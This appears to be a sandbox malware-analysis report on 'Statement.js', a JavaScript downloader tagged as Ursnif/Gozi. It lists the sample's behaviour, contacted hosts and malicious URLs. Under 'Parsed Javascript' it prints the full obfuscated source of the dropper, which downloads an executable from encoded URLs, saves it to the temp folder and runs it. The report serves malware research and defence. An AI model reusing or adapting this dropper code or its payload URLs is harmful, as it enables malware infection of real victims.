Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'Statement.js'

malicious

Threat Score: 100/100 AV Detection: 26% Labeled as: Trojan.Script #gozi #isfb #papras #ursnif

Statement.js

This report is generated from a file or URL submitted to this webservice on August 7th 2017 02:13:34 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v6.90 © Hybrid Analysis

Overview Sample unavailable Re-analyze Hash Seen Before Show Similar Samples Request Report Deletion

Incident Response

Risk Assessment

Remote Access: Reads terminal service related keys (often RDP related)
Persistence: Writes data to a remote process
Fingerprint: Reads the active computer name
Reads the cryptographic machine GUID
Network Behavior: Contacts 1 domain and 2 hosts. View all details

Additional Context

Related Sandbox Artifacts

Associated SHA256s: baa641a16b90fae9dd94eadd2e1b722ed16e9d9a41f52a5311515649d29ba4af

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

Malicious Indicators 10
External Systems
- Detected Emerging Threats Alert
  
  details
  
  Detected alert "ETPRO TROJAN Malicious SSL certificate detected (Ursnif Injects)" (SID: 2822166, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
  
  source
  
  Suricata Alerts
  
  relevance
  
  10/10
- Sample was identified as malicious by at least one Antivirus engine
  
  details
  
  3/58 Antivirus vendors marked sample as malicious (5% detection rate)
  
  source
  
  External System
  
  relevance
  
  8/10
General
- The analysis spawned a process that was identified as malicious
  
  details
  
  5/64 Antivirus vendors marked spawned process "goJnUL86e.exe" (PID: 2836) as malicious (classified as "Trojan.WisdomEyes.16070401.9500" with 7% detection rate)
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
Installation/Persistance
- Writes data to a remote process
  
  details
  
  "wscript.exe" wrote 32 bytes to a remote process "%TEMP%\goJnUL86e.exe" (Handle: 1904)
  "wscript.exe" wrote 52 bytes to a remote process "%TEMP%\goJnUL86e.exe" (Handle: 1904)
  "wscript.exe" wrote 4 bytes to a remote process "%TEMP%\goJnUL86e.exe" (Handle: 1904)
  "goJnUL86e.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 184)
  "goJnUL86e.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 184)
  "goJnUL86e.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 184)
  "goJnUL86e.exe" wrote 24 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 184)
  "goJnUL86e.exe" wrote 8 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 184)
  
  source
  
  API Call
  
  relevance
  
  6/10
Network Related
- Malicious artifacts seen in the context of a contacted host
  
  details
  
  Found malicious artifacts related to "13.107.6.151" (ASN: , Owner: ): ...
  
  URL: http://cyberneticsystems-my.sharepoint.com/personal/james_cybernetic_co_nz/_layouts/15/guestaccess.aspx?docid=00b4476ee19cf43adb8504e725c75d935&authkey=AZu0auXGHQGsIKmvvPtHq6w (AV positives: 1/65 scanned on 08/06/2017 23:51:41)
  URL: http://cordellandco-my.sharepoint.com/personal/cpackham_cordellandco_co_uk/_layouts/15/guestaccess.aspx?docid=07c59ec44ce4843a8856cee7f74f7cd32&authkey=AYmCq6aQGDFVGz4ye1Gm8Kk (AV positives: 1/65 scanned on 08/06/2017 22:51:48)
  URL: https://vcoss-my.sharepoint.com/personal/sally_thompson_vcoss_org_au/_layouts/15/guestaccess.aspx?docid=09aa2c95722f146d5b5ca0438bfedecbf&authkey=AeQokK-5OhgBtAIlTU-CXRM (AV positives: 1/65 scanned on 08/06/2017 21:22:57)
  URL: https://lifestylesolutionsaustltd-my.sharepoint.com/personal/margaret_higgins_lifestylesolutions_org_au/_layouts/15/guestaccess.aspx?docid=0d615ad45ab484afd9b9d35d3f9005bfc&authkey=ARqQT0PO7oUuhlzRuKsR7nQ (AV positives: 1/65 scanned on 08/06/2017 21:17:38)
  URL: http://prmintacc-my.sharepoint.com/personal/estrella_intacc_com_au/_layouts/15/guestaccess.aspx (AV positives: 2/65 scanned on 08/06/2017 09:11:34)
  File SHA256: baa641a16b90fae9dd94eadd2e1b722ed16e9d9a41f52a5311515649d29ba4af (AV positives: 5/59 scanned on 08/06/2017 23:39:13)
  File SHA256: 157d703de04271b452a1c824094d9b02254df951eac2aa78f50f22ddba7d5a7c (AV positives: 7/58 scanned on 08/04/2017 16:37:21)
  File SHA256: 1b9587fefcc221b5e488cb185eb9492deaeab6c52967833d7ed00388897992a7 (AV positives: 5/58 scanned on 08/03/2017 16:13:26)
  File SHA256: 4f3fd103c5eaaef7c80dc280ec8d25ad16bac67f0f9ddb953384b7e439e0938d (AV positives: 10/59 scanned on 08/03/2017 07:42:27)
  File SHA256: 7ab0ee51d34598d5f376f7e4ac3ab0ae985923c6c506292c7b5e7194b68a5d1d (AV positives: 13/58 scanned on 08/03/2017 02:01:11)
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
Unusual Characteristics
- Contains native function calls
  
  details
  
  NtMapViewOfSection@NTDLL.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  NtCreateSection@NTDLL.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  NtResumeProcess@NTDLL.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  NtUnmapViewOfSection@NTDLL.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  NtQueryInformationProcess@NTDLL.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  NtMapViewOfSection@NTDLL.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  NtUnmapViewOfSection@NTDLL.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  NtQueryInformationProcess@NTDLL.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  NtOpenProcessToken@NTDLL.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  NtQueryVirtualMemory@NTDLL.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  NtCreateKey@NTDLL.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  5/10
- Script connects to a host without prior DNS lookup
  
  details
  
  Process "wscript.exe" connected to "93.184.220.20" (Port: 61833, Protocol: TCP) without a DNS lookup
  Process "svchost.exe" connected to "178.33.188.154" (Port: 61835, Protocol: TCP) without a DNS lookup
  Process "svchost.exe" connected to "178.255.83.2" (Port: 61836, Protocol: TCP) without a DNS lookup
  Process "svchost.exe" connected to "178.255.83.2" (Port: 61837, Protocol: TCP) without a DNS lookup
  Process "svchost.exe" connected to "178.33.188.154" (Port: 61838, Protocol: TCP) without a DNS lookup
  
  source
  
  Monitored Target
  
  relevance
  
  10/10
- Script file shows a combination of malicious behavior
  
  details
  
  The script produces internet activity
  is obfuscated and drops files
  
  source
  
  Indicator Combinations
  
  relevance
  
  7/10
Hiding 2 Malicious Indicators
- All indicators are available only in the private webservice or standalone version

Suspicious Indicators 9
Environment Awareness
- Reads the active computer name
  
  details
  
  "wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  "svchost.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  
  source
  
  Registry Access
  
  relevance
  
  5/10
- Reads the cryptographic machine GUID
  
  details
  
  "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  "svchost.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
General
- Requested access to a system service
  
  details
  
  "wscript.exe" called "OpenService" to access the "WinHttpAutoProxySvc" service
  "wscript.exe" called "OpenService" to access the "CryptSvc" service
  "wscript.exe" called "OpenService" to access the "cryptsvc" service
  "wscript.exe" called "OpenService" to access the "" service
  "wscript.exe" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
  "wscript.exe" called "OpenService" to access the "rasman" service
  "wscript.exe" called "OpenService" to access the "RASMAN" service
  "wscript.exe" called "OpenService" to access the "ServicesActive" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
  "wscript.exe" called "OpenService" to access the "gpsvc" service
  "svchost.exe" called "OpenService" to access the "ServicesActive" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
  "svchost.exe" called "OpenService" to access the "gpsvc" service
  
  source
  
  API Call
  
  relevance
  
  10/10
- Sent a control code to a service
  
  details
  
  "wscript.exe" called "ControlService" and sent control code "0X400" to the service "CryptSvc"
  "wscript.exe" called "ControlService" and sent control code "0X24" to the service "cryptsvc"
  "wscript.exe" called "ControlService" and sent control code "0X24" to the service "gpsvc"
  "wscript.exe" called "ControlService" and sent control code "0XFC" to the service "gpsvc"
  "svchost.exe" called "ControlService" and sent control code "0X24" to the service "gpsvc"
  "svchost.exe" called "ControlService" and sent control code "0XFC" to the service "gpsvc"
  
  source
  
  API Call
  
  relevance
  
  10/10
- The analysis extracted a file that was identified as malicious
  
  details
  
  5/64 Antivirus vendors marked dropped file "goJnUL86e.exe" as malicious (classified as "Trojan.WisdomEyes.16070401.9500" with 7% detection rate)
  5/64 Antivirus vendors marked dropped file "download[1].aspx" as malicious (classified as "Trojan.WisdomEyes.16070401.9500" with 7% detection rate)
  
  source
  
  Extracted File
  
  relevance
  
  10/10
Installation/Persistance
- Creates new processes
  
  details
  
  "wscript.exe" is creating a new process (Name: "%TEMP%\goJnUL86e.exe", Handle: p)
  "goJnUL86e.exe" is creating a new process (Name: "%WINDIR%\System32\svchost.exe", Handle: )
  
  source
  
  API Call
  
  relevance
  
  8/10
Remote Access Related
- Reads terminal service related keys (often RDP related)
  
  details
  
  "goJnUL86e.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\TERMINAL SERVER"; Key: "TSUSERENABLED")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
Unusual Characteristics
- Found decoded Javascript strings
  
  details
  
  "str"
  
  source
  
  String
  
  relevance
  
  10/10
- Writes PE header magic to ADO Stream Object
  
  details
  
  "wscript.exe" called "ADODB.Stream.6.0.Write" and wrote "MZ"
  which might be a PE fixup attempt ...
  
  source
  
  API Call
  
  relevance
  
  5/10

Informative 27
Anti-Detection/Stealthyness
- Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
  
  details
  
  "wscript.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
  
  source
  
  Registry Access
  
  relevance
  
  3/10
Environment Awareness
- Contains ability to query machine time
  
  details
  
  GetSystemTimeAsFileTime@KERNEL32.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  GetSystemTimeAsFileTime@KERNEL32.DLL from goJnUL86e.exe (PID: 2836) (Show Stream)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  1/10
- Reads the registry for installed applications
  
  details
  
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\GOJNUL86E.EXE")
  "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\GOJNUL86E.EXE")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
General
- Accesses Software Policy Settings
  
  details
  
  "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS"; Key: "")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Accesses System Certificates Settings
  
  details
  
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\27AC9369FAF25207BB2627CEFACCBE4EF9C319B8"; Key: "BLOB")
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA"; Key: "BLOB")
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\FF67367C5CD4DE4AE18BCCE1D70FDABD7C866135"; Key: "BLOB")
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\109F1CAED645BB78B3EA2B94C0697C740733031C"; Key: "BLOB")
  "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\D559A586669B08F46A30A133F8A9ED3D038E2EA8"; Key: "BLOB")
  "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\FEE449EE0E3965A5246F000E87FDE2A065FD89D4"; Key: "BLOB")
  "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
  "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")
  "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
- Contacts domains
  
  details
  
  "talkuktelecom-my.sharepoint.com"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contacts server
  
  details
  
  "13.107.6.151:443"
  "178.33.188.154:443"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Creates a writable file in a temporary directory
  
  details
  
  "wscript.exe" created file "%TEMP%\Cab6293.tmp"
  "wscript.exe" created file "%TEMP%\Tar629E.tmp"
  "wscript.exe" created file "%TEMP%\goJnUL86e.exe"
  
  source
  
  API Call
  
  relevance
  
  1/10
- Creates mutants
  
  details
  
  "\Sessions\1\BaseNamedObjects\IESQMMUTEX_0_191"
  "Local\WininetProxyRegistryMutex"
  "Local\_!MSFTHISTORY!_"
  "Local\ZoneAttributeCacheCounterMutex"
  "Local\ZonesCacheCounterMutex"
  "Local\c:!users!iqs8ech!appdata!local!microsoft!windows!history!history.ie5!"
  "Local\ZonesCounterMutex"
  "Local\!IETld!Mutex"
  "Local\c:!users!iqs8ech!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
  "Local\ZonesLockedCacheCounterMutex"
  "IESQMMUTEX_0_208"
  "Local\c:!users!iqs8ech!appdata!roaming!microsoft!windows!cookies!"
  "RasPbFile"
  "Local\WininetStartupMutex"
  "Local\WininetConnectionMutex"
  "IESQMMUTEX_0_191"
  "Local\c:!users!iqs8ech!appdata!roaming!microsoft!windows!ietldcache!"
  "\Sessions\1\BaseNamedObjects\IESQMMUTEX_0_208"
  "\Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_"
  "\Sessions\1\BaseNamedObjects\Local\c:!users!iqs8ech!appdata!roaming!microsoft!windows!cookies!"
  
  source
  
  Created Mutant
  
  relevance
  
  3/10
- Logged script engine calls
  
  details
  
  "wscript.exe" called "WScript.Shell.1.CreateObject" ...
  "wscript.exe" called "WScript.Shell.1.ExpandEnvironmentStrings" with result: "%TEMP%\goJnUL86e.exe" ...
  "wscript.exe" called "Msxml2.XMLHTTP.CreateObject" ...
  "wscript.exe" called "Msxml2.XMLHTTP.open" ...
  "wscript.exe" called "Msxml2.XMLHTTP.readyState" with result: "4" ...
  "wscript.exe" called "Msxml2.XMLHTTP.statusText" with result: "OK" ...
  "wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
  "wscript.exe" called "ADODB.Stream.6.0.Type" ...
  "wscript.exe" called "Msxml2.XMLHTTP.responseBody" with result: "MZ" ...
  "wscript.exe" called "ADODB.Stream.6.0.Write" ...
  "wscript.exe" called "ADODB.Stream.6.0.Position" ...
  "wscript.exe" called "ADODB.Stream.6.0.SaveToFile" ...
  "wscript.exe" called "WScript.Shell.1.Run" ...
  
  source
  
  API Call
  
  relevance
  
  10/10
- Opened the service control manager
  
  details
  
  "wscript.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
  "wscript.exe" called "OpenSCManager" requesting access rights "0XE0000000L"
  
  source
  
  API Call
  
  relevance
  
  10/10
- Parsed Javascript
  
  details
  
  Output: "var cTcPk16 = 0;
  V7EsmVm = [];
  YEbZZQzlF = (((0x1575d650840a7900 * 0x5 + 0x75c997edf4cc800) / (0x195325e1802d2c00 * 4 + 0xd5d318b72cc7400)) * (6227290810542648320 / 0x2b35e3ffd1b97600));
  var iagCPv = 14 - 7 * YEbZZQzlF;
  var bTdeP18rrN = (~((-479 * 1 - 87) * (~-2) - (0xd980000 >>> 19)));
  var ISFyFJdm3db = ' ';
  bTdeP18rrN = bTdeP18rrN * (~(~(0x6e00 >> 0x7))) * YEbZZQzlF;
  TPGmyuZNW = "" + new Date();
  while (bTdeP18rrN > (((0x8800000 >>> 5) >> (0xd * 0x1 + 0x1)) % (0x261144599b8cde00 / 2743048799697821184))) {
  cN0iJCu = TPGmyuZNW.split(ISFyFJdm3db);
  V7EsmVm.push(cN0iJCu[bTdeP18rrN % (3 + 3)]);
  bTdeP18rrN = -1 + bTdeP18rrN
  }
  y_tgb0wb7 = (~((~0x0) * (0x3 << 32)));
  X50wIu = '457870616EasRy pGbyj6445bfodmpt6E7669utx726F6ERownbamKs6D65X Hdv6EsqGbmIc745374zRt Isuybr7269tcmJz6Ephurd6773'.tr();
  QxgoLa8eWQJs = this['4163746976oxwjUb65584FPwwmJ62acIeHet6A65Gas6374'.tr()];
  CXspSP02 = ['6874bdJp74nfm70733Aaww2F2F7461kXu6CS dOlm6BpnksksgZMyymlw75 svwblcuyr6B74 qPa65knHgSoluphdo6C6563hlpavfV6F6D2DJefo iar6Dx rypa792E73su eofbegRqaMd68pexzz61Xym7265nRuP Livt70XarvzvkssJcj6Fc uprpb iN txq69ewOyXSvyWbmfu6E742Ehuy63Qia6F6DfNfV2FV bsc7065wkySf72uvnia73nqYl6FwLUeHj6E616Coc 2F73hwJiTbyxnxk6176geWwvlwavcs5Fkrtj 74eI c616CjtoahxnX6B756Bdvxbug74656C65o fUjrxd636F6Dhwyt5F63d w6F5FaVioW756Bhulge2Fntvw5F wH6CxMk 61mopjiuci796Fuigncsbq757473Vrwccpi2FhYQ31352F67wxb75657374gK OqlQqwxszscWt61bns63Gudxylf63 te6573732EYmcv6173brxukwywvl70jfbpiPlx 783FK c646F6369cdpyhakf643D30mppi35nyeld3136wpv336566viwX6363bjyd34bp ww656164x 346430gejIjdbz36ewgajrth6234VcZ39333265t qnei32UxZgt3932bds c6130Hwp Nyf dJwjZT34yfLgvIfkyOgfsykyJ gssjnjeyoctnKwt61j L38 Noge6238tGRkh2661lef xkxbq Qv7574686Bmlv65PvTTGfiT793D41 gp53wbkG5374ReHyhc39576Ao dl o 642Dqtm6A63465Af ywdxTZ5F4751 jcdx hyfnp4F4FMpoa6Awyw3330ddKeUp7155'.tr(), '6874747073mhhIvqr Xqk3A2F2F73Tygghhalkiw74616EoJanb6472Rund ex657773nmtRjpxm 72NkM 69616CPcvvfHtXzpUqyfvgajqotsRya ovb Pw74zxhstu6F2DvQNgvbewbpe ersm6D792EHo llpmoHkuLzHikIjNwuW73gpe6861bejf726570rbL6F69brl6EbSip742E63 wyp6F6Df j2F706572vm uv73PjygprU6F6E61HosjwqlTwqppefwgmfsRV6Chcyvn2F72Hiavhm69yiW616C746FyYjy63puWypajb657072uqpefbnqz6F6A65qLoKrsunjHcw63m p745Fk r 7374cPnaw616E64php726577xzWwVxPbq uopcrjkm737269Qp 616C746FOddX Zsdnyc5FgIq69652Fgsyusu 5Fgxfws6C6179rcvv6FwprsrRv75Opkl74732Fabmde31aezjjhx35trzH2FOpjx67ryminmbf7565upy73746163Xj aebH63HmeNvN657373jwk2E6173qzeg70munevtipZZzw783Fxrrhlu xu ap646F6369mo Y643D jO306638ud cjX65tlyyw66wvtr 3032Oibu66zOluohs636537NnUar3162I KsHeabiurU3436ifX313961jktogiwcU6163kbNesjd3237rr 33ccy3338jLl376134ekn36663565zlajhlIwddb jx38vMf2661dolO75cfsvoypoRkw7468 qa6B65giQHh79MjqzqKexswnU3D41rvp666839hVZg71uQfcokpv2D33UGz3153xvjx 4B6CpWxjmejfj50Zhck76m o x76jNnaSk uT63 jofp74mqvtlcky585932dQamZp79454A45'.tr()];
  Iw7NDHE3h6L = new QxgoLa8eWQJs('57536372697074alblO2E53kdxZbgTefWuotS6865yhhesxup6Cxrt6C'.tr());
  xxNIVi = '52756E'.tr();
  kjiamnwS01pn = Iw7NDHE3h6L[X50wIu]('2554454D50oYxJ aLb25iuvS2F67idadktPrj6F4A e nIlGb6E55dqdb x4C3836dad652E65uunj78UYp65'.tr());
  try {
  WjsincMu04mn = new QxgoLa8eWQJs('4D53584D4Cycko322E58rsLd4D4CozswrPn4854rI r54 lyd50'.tr());
  while (cTcPk16 == 0) {
  WjsincMu04mn['6F70656E'.tr()]('4745qlrndpwbzgrvlirbbxperrkswablrcpldHfH qw54'.tr(), CXspSP02[iagCPv], (((0x28d * 8 + 0x218) >>> (234881024 >>> 0x19)) % (0x65990ebcd335b400 / 7320898873427604480)));
  ++iagCPv;
  if (iagCPv == CXspSP02.length) iagCPv = (((0x103000 >> 0xc) * (8073834705028118528 / 8073834705028118528) + (1333788672 >>> 23)) % (~-2));
  WjsincMu04mn['73656E64'.tr()]();
  while (WjsincMu04mn['72656164qpwzneLencr79dluHgqpl Jhzcz73746174mcvus65'.tr()] < (YEbZZQzlF + y_tgb0wb7)) {
  Iw7NDHE3h6L['536C656570'.tr()]((((0x3 * 66 + 0x2) >> (0x1 << 1)) << (16384 >> 0xe)));
  }
  eoECJZjuESk = WjsincMu04mn['73746174iihgqfa75nnm7354maxM6578eihbvqq sIwYeYob74'.tr()];
  if (eoECJZjuESk && eoECJZjuESk == '4F4B'.tr()) cTcPk16 = ((~(~0x4000)) >> (14 << 32));
  }
  wewg2GZ = new QxgoLa8eWQJs('41444F44422Eeqzj537472pUg65616D'.tr());
  wewg2GZ['6F70qakikeekaxvJ65ixyzh6E'.tr()]();
  wewg2GZ['74797065'.tr()] = YEbZZQzlF - (~((-56532 * 1 - 0x232c) >> (0xf << 32)));
  wewg2GZ['77726974dxXkG65'.tr()](WjsincMu04mn['52657370igwUmHc6FyVkpp6E73Ysab 6542ufp6F6479'.tr()]);
  wewg2GZ['706F73 nbvzb6974696Fg ftQxknj6E'.tr()] = YEbZZQzlF - y_tgb0wb7;
  wewg2GZ['73617665546F46sjekl696Cqae J65'.tr()](kjiamnwS01pn, y_tgb0wb7);
  wewg2GZ['636C6FmRQfwdxrd 73Y w65'.tr()]();
  Iw7NDHE3h6L[xxNIVi](kjiamnwS01pn, (((4 * 0xd + 0x1) * (512 >>> 0x9) + (32768 >> 0xa)) % (1 << 0x20)), y_tgb0wb7 - YEbZZQzlF);
  } catch (FDCBEIK) {}
  
  function tick(str) {
  var B5JZP8QBG = ((~(-116 * 0x1 - 0x57)) % (0x100000 >> 0x14));
  var qvHyZw1J76aT = "";
  var qDhA9qv = String.fromCharCode(str);
  for (wdsk9Zxz = 0; wdsk9Zxz < 100; wdsk9Zxz++) {
  B5JZP8QBG = B5JZP8QBG + 1;
  };
  return qDhA9qv;
  }
  
  function String.prototype.tr() {
  var sTISRf1 = YEbZZQzlF - y_tgb0wb7;
  var PwzzhsbEK = '0';
  var XoKtq3 = '';
  var fEz395bO = 'G';
  var AH2BxOt0_jl5 = XoKtq3;
  var pmT4G8m = this.split(XoKtq3);
  var SpUzJI_GH = pmT4G8m.length * 12 / 2;
  if (V7EsmVm[SpUzJI_GH + 9 / 3].length == (2 * 2)) {
  var ki1yamWeew00 = XoKtq3;
  for (var i = 0; i < SpUzJI_GH / (1 + 5); i++) {
  XoKtq3 = pmT4G8m[i];
  if ((XoKtq3 >= PwzzhsbEK) && (XoKtq3 < fEz395bO)) {
  if (ki1yamWeew00.length > 0) {
  WAWYAbrwlj = parseInt(ki1yamWeew00 + XoKtq3, 8 * 2);
  ki1yamWeew00 = '';
  AH2BxOt0_jl5 = AH2BxOt0_jl5 + tick(WAWYAbrwlj);
  } else {
  ki1yamWeew00 = XoKtq3;
  }
  }
  }
  }
  return AH2BxOt0_jl5;
  }"
  
  source
  
  Static Parser
  
  relevance
  
  5/10
- Reads Windows Trust Settings
  
  details
  
  "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
  
  source
  
  Registry Access
  
  relevance
  
  5/10
- Script failed to issue a HTTP request
  
  details
  
  "wscript.exe" failed a HTTP request with the response code "OK"
  
  source
  
  API Call
  
  relevance
  
  10/10
- Spawns new processes
  
  details
  
  Spawned process "goJnUL86e.exe" (Show Process)
  Spawned process "svchost.exe" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  3/10
Installation/Persistance
- Dropped files
  
  details
  
  "goJnUL86e.exe" has type "PE32 executable (console) Intel 80386 for MS Windows"
  "74FBF93595CFC8459196065CE54AD928" has type "data"
  "34DA60AA966CD9270C5362E6AEF824CF" has type "data"
  "40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" has type "data"
  "download[1].aspx" has type "PE32 executable (console) Intel 80386 for MS Windows"
  "Tar629E.tmp" has type "data"
  "Cab6293.tmp" has type "Microsoft Cabinet archive data 50939 bytes 1 file"
  
  source
  
  Extracted File
  
  relevance
  
  3/10
- Drops executable files
  
  details
  
